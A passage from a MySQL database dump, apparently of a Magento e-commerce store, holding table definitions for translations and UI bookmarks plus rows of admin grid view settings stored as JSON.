  `is_temporary` tinyint(1) NOT NULL DEFAULT 0 COMMENT 'Is Temporary File'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Core theme files';

-- --------------------------------------------------------

--
-- Table structure for table `translation`
--

CREATE TABLE `translation` (
  `key_id` int(10) UNSIGNED NOT NULL COMMENT 'Key ID of Translation',
  `string` varchar(255) NOT NULL DEFAULT 'Translate String' COMMENT 'Translation String',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `translate` varchar(255) DEFAULT NULL COMMENT 'Translate',
  `locale` varchar(20) NOT NULL DEFAULT 'en_US' COMMENT 'Locale',
  `crc_string` bigint(20) NOT NULL DEFAULT 1591228201 COMMENT 'Translation String CRC32 Hash'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Translations';

-- --------------------------------------------------------

--
-- Table structure for table `ui_bookmark`
--

CREATE TABLE `ui_bookmark` (
  `bookmark_id` int(10) UNSIGNED NOT NULL COMMENT 'Bookmark identifier',
  `user_id` int(10) UNSIGNED NOT NULL COMMENT 'User ID',
  `namespace` varchar(255) NOT NULL COMMENT 'Bookmark namespace',
  `identifier` varchar(255) NOT NULL COMMENT 'Bookmark Identifier',
  `current` smallint(6) NOT NULL COMMENT 'Mark current bookmark per user and identifier',
  `title` varchar(255) DEFAULT NULL COMMENT 'Bookmark title',
  `config` longtext DEFAULT NULL COMMENT 'Bookmark config',
  `created_at` datetime NOT NULL DEFAULT current_timestamp() COMMENT 'Bookmark created at',
  `updated_at` datetime NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Bookmark updated at'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Bookmark';

--
-- Dumping data for table `ui_bookmark`
--

INSERT INTO `ui_bookmark` (`bookmark_id`, `user_id`, `namespace`, `identifier`, `current`, `title`, `config`, `created_at`, `updated_at`) VALUES
(1, 1, 'design_config_listing', 'default', 1, 'Default View', '{\"views\":{\"default\":{\"label\":\"Default View\",\"index\":\"default\",\"editable\":false,\"data\":{\"filters\":{\"applied\":{\"placeholder\":true}},\"displayMode\":\"grid\",\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"columns\":{\"store_website_id\":{\"visible\":true,\"sorting\":false},\"store_group_id\":{\"visible\":true,\"sorting\":false},\"store_id\":{\"visible\":true,\"sorting\":false},\"theme_theme_id\":{\"visible\":true,\"sorting\":false},\"default\":{\"visible\":true,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false}},\"positions\":{\"default\":0,\"store_website_id\":1,\"store_group_id\":2,\"store_id\":3,\"theme_theme_id\":4,\"actions\":5}},\"value\":\"Default View\"}}}', '2020-08-02 13:50:21', '2020-08-02 13:50:21'),
(2, 1, 'design_config_listing', 'current', 0, NULL, '{\"current\":{\"filters\":{\"applied\":{\"placeholder\":true}},\"displayMode\":\"grid\",\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"columns\":{\"store_website_id\":{\"visible\":true,\"sorting\":false},\"store_group_id\":{\"visible\":true,\"sorting\":false},\"store_id\":{\"visible\":true,\"sorting\":false},\"theme_theme_id\":{\"visible\":true,\"sorting\":false},\"default\":{\"visible\":true,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false}},\"positions\":{\"default\":0,\"store_website_id\":1,\"store_group_id\":2,\"store_id\":3,\"theme_theme_id\":4,\"actions\":5}}}', '2020-08-02 13:50:22', '2020-08-02 13:50:22'),
(3, 1, 'cms_page_listing', 'current', 0, NULL, '{\"current\":{\"filters\":{\"applied\":{\"placeholder\":true}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"columns\":{\"page_id\":{\"visible\":true,\"sorting\":\"asc\"},\"title\":{\"visible\":true,\"sorting\":false},\"identifier\":{\"visible\":true,\"sorting\":false},\"store_id\":{\"visible\":true,\"sorting\":false},\"meta_title\":{\"visible\":false,\"sorting\":false},\"meta_keywords\":{\"visible\":false,\"sorting\":false},\"meta_description\":{\"visible\":false,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"page_layout\":{\"visible\":true,\"sorting\":false},\"is_active\":{\"visible\":true,\"sorting\":false},\"custom_theme\":{\"visible\":false,\"sorting\":false},\"custom_root_template\":{\"visible\":false,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"creation_time\":{\"visible\":true,\"sorting\":false},\"update_time\":{\"visible\":true,\"sorting\":false},\"custom_theme_from\":{\"visible\":false,\"sorting\":false},\"custom_theme_to\":{\"visible\":false,\"sorting\":false}},\"search\":{\"value\":\"\"},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"page_id\":1,\"title\":2,\"identifier\":3,\"page_layout\":4,\"store_id\":5,\"is_active\":6,\"creation_time\":7,\"update_time\":8,\"custom_theme_from\":9,\"custom_theme_to\":10,\"custom_theme\":11,\"custom_root_template\":12,\"meta_title\":13,\"meta_keywords\":14,\"meta_description\":15,\"actions\":16}}}', '2020-08-02 13:52:47', '2020-08-02 13:52:47'),
(4, 1, 'cms_page_listing', 'default', 1, 'Default View', '{\"views\":{\"default\":{\"label\":\"Default View\",\"index\":\"default\",\"editable\":false,\"data\":{\"filters\":{\"applied\":{\"placeholder\":true}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"columns\":{\"page_id\":{\"visible\":true,\"sorting\":\"asc\"},\"title\":{\"visible\":true,\"sorting\":false},\"identifier\":{\"visible\":true,\"sorting\":false},\"store_id\":{\"visible\":true,\"sorting\":false},\"meta_title\":{\"visible\":false,\"sorting\":false},\"meta_keywords\":{\"visible\":false,\"sorting\":false},\"meta_description\":{\"visible\":false,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"page_layout\":{\"visible\":true,\"sorting\":false},\"is_active\":{\"visible\":true,\"sorting\":false},\"custom_theme\":{\"visible\":false,\"sorting\":false},\"custom_root_template\":{\"visible\":false,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"creation_time\":{\"visible\":true,\"sorting\":false},\"update_time\":{\"visible\":true,\"sorting\":false},\"custom_theme_from\":{\"visible\":false,\"sorting\":false},\"custom_theme_to\":{\"visible\":false,\"sorting\":false}},\"search\":{\"value\":\"\"},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"page_id\":1,\"title\":2,\"identifier\":3,\"page_layout\":4,\"store_id\":5,\"is_active\":6,\"creation_time\":7,\"update_time\":8,\"custom_theme_from\":9,\"custom_theme_to\":10,\"custom_theme\":11,\"custom_root_template\":12,\"meta_title\":13,\"meta_keywords\":14,\"meta_description\":15,\"actions\":16}},\"value\":\"Default View\"}}}', '2020-08-02 13:52:48', '2020-08-02 13:52:48'),
(5, 1, 'cms_block_listing', 'current', 0, NULL, '{\"current\":{\"filters\":{\"applied\":{\"placeholder\":true}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"columns\":{\"block_id\":{\"visible\":true,\"sorting\":\"asc\"},\"title\":{\"visible\":true,\"sorting\":false},\"identifier\":{\"visible\":true,\"sorting\":false},\"store_id\":{\"visible\":true,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"creation_time\":{\"visible\":true,\"sorting\":false},\"update_time\":{\"visible\":true,\"sorting\":false},\"is_active\":{\"visible\":true,\"sorting\":false}},\"search\":{\"value\":\"\"},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"block_id\":1,\"title\":2,\"identifier\":3,\"store_id\":4,\"is_active\":5,\"creation_time\":6,\"update_time\":7,\"actions\":8}}}', '2020-08-02 13:53:53', '2020-08-02 13:53:53'),
(6, 1, 'cms_block_listing', 'default', 1, 'Default View', '{\"views\":{\"default\":{\"label\":\"Default View\",\"index\":\"default\",\"editable\":false,\"data\":{\"filters\":{\"applied\":{\"placeholder\":true}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"columns\":{\"block_id\":{\"visible\":true,\"sorting\":\"asc\"},\"title\":{\"visible\":true,\"sorting\":false},\"identifier\":{\"visible\":true,\"sorting\":false},\"store_id\":{\"visible\":true,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"creation_time\":{\"visible\":true,\"sorting\":false},\"update_time\":{\"visible\":true,\"sorting\":false},\"is_active\":{\"visible\":true,\"sorting\":false}},\"search\":{\"value\":\"\"},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"block_id\":1,\"title\":2,\"identifier\":3,\"store_id\":4,\"is_active\":5,\"creation_time\":6,\"update_time\":7,\"actions\":8}},\"value\":\"Default View\"}}}', '2020-08-02 13:54:00', '2020-08-02 13:54:00'),
(7, 1, 'mpbannerslider_slider_listing', 'current', 0, NULL, '{\"current\":{\"filters\":{\"applied\":{\"placeholder\":true}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"columns\":{\"slider_id\":{\"visible\":true,\"sorting\":\"asc\"},\"name\":{\"visible\":true,\"sorting\":false},\"banners\":{\"visible\":true,\"sorting\":false},\"location\":{\"visible\":true,\"sorting\":false},\"store_ids\":{\"visible\":true,\"sorting\":false},\"customer_group_ids\":{\"visible\":true,\"sorting\":false},\"priority\":{\"visible\":true,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"status\":{\"visible\":true,\"sorting\":false},\"from_date\":{\"visible\":true,\"sorting\":false},\"to_date\":{\"visible\":true,\"sorting\":false}},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"slider_id\":1,\"name\":2,\"status\":3,\"banners\":4,\"location\":5,\"store_ids\":6,\"customer_group_ids\":7,\"priority\":8,\"from_date\":9,\"to_date\":10,\"actions\":11}}}', '2020-08-02 15:09:07', '2020-08-02 15:09:07'),
(8, 1, 'mpbannerslider_banner_listing', 'current', 0, NULL, '{\"current\":{\"filters\":{\"applied\":{\"placeholder\":true}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"columns\":{\"banner_id\":{\"visible\":true,\"sorting\":\"asc\"},\"name\":{\"visible\":true,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"type\":{\"visible\":true,\"sorting\":false},\"status\":{\"visible\":true,\"sorting\":false},\"created_at\":{\"visible\":true,\"sorting\":false},\"updated_at\":{\"visible\":true,\"sorting\":false},\"content\":{\"visible\":true,\"sorting\":false}},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"banner_id\":1,\"content\":2,\"name\":3,\"type\":4,\"status\":5,\"created_at\":6,\"updated_at\":7,\"actions\":8}}}', '2020-08-02 15:09:15', '2020-08-02 15:09:15'),
(9, 1, 'mpbannerslider_slider_listing', 'default', 1, 'Default View', '{\"views\":{\"default\":{\"label\":\"Default View\",\"index\":\"default\",\"editable\":false,\"data\":{\"filters\":{\"applied\":{\"placeholder\":true}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"columns\":{\"slider_id\":{\"visible\":true,\"sorting\":\"asc\"},\"name\":{\"visible\":true,\"sorting\":false},\"banners\":{\"visible\":true,\"sorting\":false},\"location\":{\"visible\":true,\"sorting\":false},\"store_ids\":{\"visible\":true,\"sorting\":false},\"customer_group_ids\":{\"visible\":true,\"sorting\":false},\"priority\":{\"visible\":true,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"status\":{\"visible\":true,\"sorting\":false},\"from_date\":{\"visible\":true,\"sorting\":false},\"to_date\":{\"visible\":true,\"sorting\":false}},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"slider_id\":1,\"name\":2,\"status\":3,\"banners\":4,\"location\":5,\"store_ids\":6,\"customer_group_ids\":7,\"priority\":8,\"from_date\":9,\"to_date\":10,\"actions\":11}},\"value\":\"Default View\"}}}', '2020-08-02 15:09:16', '2020-08-02 15:09:16'),
(10, 1, 'mpbannerslider_banner_listing', 'default', 1, 'Default View', '{\"views\":{\"default\":{\"label\":\"Default View\",\"index\":\"default\",\"editable\":false,\"data\":{\"filters\":{\"applied\":{\"placeholder\":true}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"columns\":{\"banner_id\":{\"visible\":true,\"sorting\":\"asc\"},\"name\":{\"visible\":true,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"type\":{\"visible\":true,\"sorting\":false},\"status\":{\"visible\":true,\"sorting\":false},\"created_at\":{\"visible\":true,\"sorting\":false},\"updated_at\":{\"visible\":true,\"sorting\":false},\"content\":{\"visible\":true,\"sorting\":false}},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"banner_id\":1,\"content\":2,\"name\":3,\"type\":4,\"status\":5,\"created_at\":6,\"updated_at\":7,\"actions\":8}},\"value\":\"Default View\"}}}', '2020-08-02 15:09:26', '2020-08-02 15:09:26'),
(11, 1, 'adobe_stock_images_listing', 'current', 0, NULL, '{\"current\":{\"search\":{\"value\":\"\"},\"paging\":{\"pageSize\":32,\"current\":1,\"value\":32},\"filters\":{\"applied\":{\"placeholder\":true}},\"columns\":{\"relevance\":{\"visible\":false,\"sorting\":false},\"creation\":{\"visible\":false,\"sorting\":false},\"popularity\":{\"visible\":false,\"sorting\":false},\"nb_downloads\":{\"visible\":false,\"sorting\":false},\"undiscovered\":{\"visible\":false,\"sorting\":false},\"thumbnail_url\":{\"visible\":true,\"sorting\":false},\"overlay\":{\"visible\":true,\"sorting\":false},\"preview\":{\"visible\":true,\"sorting\":false}},\"displayMode\":\"grid\",\"positions\":{\"overlay\":0,\"thumbnail_url\":1,\"preview\":2,\"relevance\":3,\"creation\":4,\"popularity\":5,\"nb_downloads\":6,\"undiscovered\":7}}}', '2020-08-02 15:20:49', '2020-08-02 15:20:49'),
(12, 1, 'adobe_stock_images_listing', 'default', 1, 'Default View', '{\"views\":{\"default\":{\"label\":\"Default View\",\"index\":\"default\",\"editable\":false,\"data\":{\"search\":{\"value\":\"\"},\"paging\":{\"pageSize\":32,\"current\":1,\"value\":32},\"filters\":{\"applied\":{\"placeholder\":true}},\"columns\":{\"relevance\":{\"visible\":false,\"sorting\":false},\"creation\":{\"visible\":false,\"sorting\":false},\"popularity\":{\"visible\":false,\"sorting\":false},\"nb_downloads\":{\"visible\":false,\"sorting\":false},\"undiscovered\":{\"visible\":false,\"sorting\":false},\"thumbnail_url\":{\"visible\":true,\"sorting\":false},\"overlay\":{\"visible\":true,\"sorting\":false},\"preview\":{\"visible\":true,\"sorting\":false}},\"displayMode\":\"grid\",\"positions\":{\"overlay\":0,\"thumbnail_url\":1,\"preview\":2,\"relevance\":3,\"creation\":4,\"popularity\":5,\"nb_downloads\":6,\"undiscovered\":7}},\"value\":\"Default View\"}}}', '2020-08-02 15:20:50', '2020-08-02 15:20:50'),
(13, 1, 'product_listing', 'default', 1, 'Default View', '{\"views\":{\"default\":{\"label\":\"Default View\",\"index\":\"default\",\"editable\":false,\"data\":{\"filters\":{\"applied\":{\"placeholder\":true}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"search\":{\"value\":\"\"},\"columns\":{\"entity_id\":{\"visible\":true,\"sorting\":\"asc\"},\"name\":{\"visible\":true,\"sorting\":false},\"sku\":{\"visible\":true,\"sorting\":false},\"price\":{\"visible\":true,\"sorting\":false},\"websites\":{\"visible\":true,\"sorting\":false},\"qty\":{\"visible\":true,\"sorting\":false},\"short_description\":{\"visible\":false,\"sorting\":false},\"special_price\":{\"visible\":false,\"sorting\":false},\"cost\":{\"visible\":false,\"sorting\":false},\"weight\":{\"visible\":false,\"sorting\":false},\"meta_title\":{\"visible\":false,\"sorting\":false},\"meta_keyword\":{\"visible\":false,\"sorting\":false},\"meta_description\":{\"visible\":false,\"sorting\":false},\"msrp\":{\"visible\":false,\"sorting\":false},\"url_key\":{\"visible\":false,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"type_id\":{\"visible\":true,\"sorting\":false},\"attribute_set_id\":{\"visible\":true,\"sorting\":false},\"visibility\":{\"visible\":true,\"sorting\":false},\"status\":{\"visible\":true,\"sorting\":false},\"manufacturer\":{\"visible\":false,\"sorting\":false},\"color\":{\"visible\":false,\"sorting\":false},\"custom_design\":{\"visible\":false,\"sorting\":false},\"page_layout\":{\"visible\":false,\"sorting\":false},\"country_of_manufacture\":{\"visible\":false,\"sorting\":false},\"custom_layout\":{\"visible\":false,\"sorting\":false},\"gift_message_available\":{\"visible\":false,\"sorting\":false},\"tax_class_id\":{\"visible\":false,\"sorting\":false},\"special_from_date\":{\"visible\":false,\"sorting\":false},\"special_to_date\":{\"visible\":false,\"sorting\":false},\"news_from_date\":{\"visible\":false,\"sorting\":false},\"news_to_date\":{\"visible\":false,\"sorting\":false},\"custom_design_from\":{\"visible\":false,\"sorting\":false},\"custom_design_to\":{\"visible\":false,\"sorting\":false},\"salable_quantity\":{\"visible\":true,\"sorting\":false},\"thumbnail\":{\"visible\":true,\"sorting\":false}},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"entity_id\":1,\"thumbnail\":2,\"name\":3,\"type_id\":4,\"attribute_set_id\":5,\"sku\":6,\"price\":7,\"qty\":8,\"salable_quantity\":9,\"visibility\":10,\"status\":11,\"websites\":12,\"short_description\":13,\"special_price\":14,\"special_from_date\":15,\"special_to_date\":16,\"cost\":17,\"weight\":18,\"manufacturer\":19,\"meta_title\":20,\"meta_keyword\":21,\"meta_description\":22,\"color\":23,\"news_from_date\":24,\"news_to_date\":25,\"custom_design\":26,\"custom_design_from\":27,\"custom_design_to\":28,\"page_layout\":29,\"country_of_manufacture\":30,\"custom_layout\":31,\"msrp\":32,\"url_key\":33,\"gift_message_available\":34,\"tax_class_id\":35,\"actions\":36}},\"value\":\"Default View\"}}}', '2020-08-02 15:59:03', '2020-08-02 15:59:03'),
(14, 1, 'product_listing', 'current', 0, NULL, '{\"current\":{\"filters\":{\"applied\":{\"placeholder\":true}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"search\":{\"value\":\"\"},\"columns\":{\"entity_id\":{\"visible\":true,\"sorting\":\"asc\"},\"name\":{\"visible\":true,\"sorting\":false},\"sku\":{\"visible\":true,\"sorting\":false},\"price\":{\"visible\":true,\"sorting\":false},\"websites\":{\"visible\":true,\"sorting\":false},\"qty\":{\"visible\":true,\"sorting\":false},\"short_description\":{\"visible\":false,\"sorting\":false},\"special_price\":{\"visible\":false,\"sorting\":false},\"cost\":{\"visible\":false,\"sorting\":false},\"weight\":{\"visible\":false,\"sorting\":false},\"meta_title\":{\"visible\":false,\"sorting\":false},\"meta_keyword\":{\"visible\":false,\"sorting\":false},\"meta_description\":{\"visible\":false,\"sorting\":false},\"msrp\":{\"visible\":false,\"sorting\":false},\"url_key\":{\"visible\":false,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"type_id\":{\"visible\":true,\"sorting\":false},\"attribute_set_id\":{\"visible\":true,\"sorting\":false},\"visibility\":{\"visible\":true,\"sorting\":false},\"status\":{\"visible\":true,\"sorting\":false},\"manufacturer\":{\"visible\":false,\"sorting\":false},\"color\":{\"visible\":false,\"sorting\":false},\"custom_design\":{\"visible\":false,\"sorting\":false},\"page_layout\":{\"visible\":false,\"sorting\":false},\"country_of_manufacture\":{\"visible\":false,\"sorting\":false},\"custom_layout\":{\"visible\":false,\"sorting\":false},\"gift_message_available\":{\"visible\":false,\"sorting\":false},\"tax_class_id\":{\"visible\":false,\"sorting\":false},\"special_from_date\":{\"visible\":false,\"sorting\":false},\"special_to_date\":{\"visible\":false,\"sorting\":false},\"news_from_date\":{\"visible\":false,\"sorting\":false},\"news_to_date\":{\"visible\":false,\"sorting\":false},\"custom_design_from\":{\"visible\":false,\"sorting\":false},\"custom_design_to\":{\"visible\":false,\"sorting\":false},\"salable_quantity\":{\"visible\":true,\"sorting\":false},\"thumbnail\":{\"visible\":true,\"sorting\":false}},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"entity_id\":1,\"thumbnail\":2,\"name\":3,\"type_id\":4,\"attribute_set_id\":5,\"sku\":6,\"price\":7,\"qty\":8,\"salable_quantity\":9,\"visibility\":10,\"status\":11,\"websites\":12,\"short_description\":13,\"special_price\":14,\"special_from_date\":15,\"special_to_date\":16,\"cost\":17,\"weight\":18,\"manufacturer\":19,\"meta_title\":20,\"meta_keyword\":21,\"meta_description\":22,\"color\":23,\"news_from_date\":24,\"news_to_date\":25,\"custom_design\":26,\"custom_design_from\":27,\"custom_design_to\":28,\"page_layout\":29,\"country_of_manufacture\":30,\"custom_layout\":31,\"msrp\":32,\"url_key\":33,\"gift_message_available\":34,\"tax_class_id\":35,\"actions\":36}}}', '2020-08-02 15:59:03', '2020-08-02 15:59:03'),
(15, 2, 'cms_page_listing', 'default', 1, 'Default View', '{\"views\":{\"default\":{\"label\":\"Default View\",\"index\":\"default\",\"editable\":false,\"data\":{\"search\":{\"value\":\"\"},\"filters\":{\"applied\":{\"placeholder\":true}},\"columns\":{\"page_id\":{\"visible\":true,\"sorting\":\"asc\"},\"title\":{\"visible\":true,\"sorting\":false},\"identifier\":{\"visible\":true,\"sorting\":false},\"store_id\":{\"visible\":true,\"sorting\":false},\"meta_title\":{\"visible\":false,\"sorting\":false},\"meta_keywords\":{\"visible\":false,\"sorting\":false},\"meta_description\":{\"visible\":false,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"page_layout\":{\"visible\":true,\"sorting\":false},\"is_active\":{\"visible\":true,\"sorting\":false},\"custom_theme\":{\"visible\":false,\"sorting\":false},\"custom_root_template\":{\"visible\":false,\"sorting\":false},\"creation_time\":{\"visible\":true,\"sorting\":false},\"update_time\":{\"visible\":true,\"sorting\":false},\"custom_theme_from\":{\"visible\":false,\"sorting\":false},\"custom_theme_to\":{\"visible\":false,\"sorting\":false}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"page_id\":1,\"title\":2,\"identifier\":3,\"page_layout\":4,\"store_id\":5,\"is_active\":6,\"creation_time\":7,\"update_time\":8,\"custom_theme_from\":9,\"custom_theme_to\":10,\"custom_theme\":11,\"custom_root_template\":12,\"meta_title\":13,\"meta_keywords\":14,\"meta_description\":15,\"actions\":16}},\"value\":\"Default View\"}}}', '2020-08-10 02:00:28', '2020-08-10 02:00:28'),
(16, 2, 'cms_page_listing', 'current', 0, NULL, '{\"current\":{\"search\":{\"value\":\"\"},\"filters\":{\"applied\":{\"placeholder\":true}},\"columns\":{\"page_id\":{\"visible\":true,\"sorting\":\"asc\"},\"title\":{\"visible\":true,\"sorting\":false},\"identifier\":{\"visible\":true,\"sorting\":false},\"store_id\":{\"visible\":true,\"sorting\":false},\"meta_title\":{\"visible\":false,\"sorting\":false},\"meta_keywords\":{\"visible\":false,\"sorting\":false},\"meta_description\":{\"visible\":false,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"page_layout\":{\"visible\":true,\"sorting\":false},\"is_active\":{\"visible\":true,\"sorting\":false},\"custom_theme\":{\"visible\":false,\"sorting\":false},\"custom_root_template\":{\"visible\":false,\"sorting\":false},\"creation_time\":{\"visible\":true,\"sorting\":false},\"update_time\":{\"visible\":true,\"sorting\":false},\"custom_theme_from\":{\"visible\":false,\"sorting\":false},\"custom_theme_to\":{\"visible\":false,\"sorting\":false}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"page_id\":1,\"title\":2,\"identifier\":3,\"page_layout\":4,\"store_id\":5,\"is_active\":6,\"creation_time\":7,\"update_time\":8,\"custom_theme_from\":9,\"custom_theme_to\":10,\"custom_theme\":11,\"custom_root_template\":12,\"meta_title\":13,\"meta_keywords\":14,\"meta_description\":15,\"actions\":16}}}', '2020-08-10 02:00:29', '2020-08-10 02:00:29'),
(17, 2, 'cms_block_listing', 'default', 1, 'Default View', '{\"views\":{\"default\":{\"label\":\"Default View\",\"index\":\"default\",\"editable\":false,\"data\":{\"search\":{\"value\":\"\"},\"filters\":{\"applied\":{\"placeholder\":true}},\"columns\":{\"block_id\":{\"visible\":true,\"sorting\":\"asc\"},\"title\":{\"visible\":true,\"sorting\":false},\"identifier\":{\"visible\":true,\"sorting\":false},\"store_id\":{\"visible\":true,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"is_active\":{\"visible\":true,\"sorting\":false},\"creation_time\":{\"visible\":true,\"sorting\":false},\"update_time\":{\"visible\":true,\"sorting\":false}},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"block_id\":1,\"title\":2,\"identifier\":3,\"store_id\":4,\"is_active\":5,\"creation_time\":6,\"update_time\":7,\"actions\":8},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20}},\"value\":\"Default View\"}}}', '2020-08-10 02:01:43', '2020-08-10 02:01:43'),
(18, 2, 'cms_block_listing', 'current', 0, NULL, '{\"current\":{\"search\":{\"value\":\"\"},\"filters\":{\"applied\":{\"placeholder\":true}},\"columns\":{\"block_id\":{\"visible\":true,\"sorting\":\"asc\"},\"title\":{\"visible\":true,\"sorting\":false},\"identifier\":{\"visible\":true,\"sorting\":false},\"store_id\":{\"visible\":true,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"is_active\":{\"visible\":true,\"sorting\":false},\"creation_time\":{\"visible\":true,\"sorting\":false},\"update_time\":{\"visible\":true,\"sorting\":false}},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"block_id\":1,\"title\":2,\"identifier\":3,\"store_id\":4,\"is_active\":5,\"creation_time\":6,\"update_time\":7,\"actions\":8},\"paging\":{\"pageSize\":30,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":30}}}', '2020-08-10 02:01:44', '2020-08-18 06:17:27'),
